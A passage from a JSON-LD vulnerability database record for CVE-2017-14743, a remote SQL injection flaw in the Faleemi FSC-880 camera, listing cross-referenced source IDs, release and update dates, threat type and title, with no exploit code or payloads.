"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "VULHUB",
"id": "VHN-105496"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"db": "PACKETSTORM",
"id": "144392"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"date": "2017-09-26T00:00:00",
"db": "VULHUB",
"id": "VHN-105496"
},
{
"date": "2017-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"date": "2017-09-29T17:58:30",
"db": "PACKETSTORM",
"id": "144392"
},
{
"date": "2017-09-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"date": "2017-09-26T06:29:00.187000",
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"date": "2017-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-105496"
},
{
"date": "2017-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008555"
},
{
"date": "2017-09-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1229"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-14743"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "144392"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Faleemi FSC-880 SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31141"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-1229"
}
],
"trust": 0.6
}
}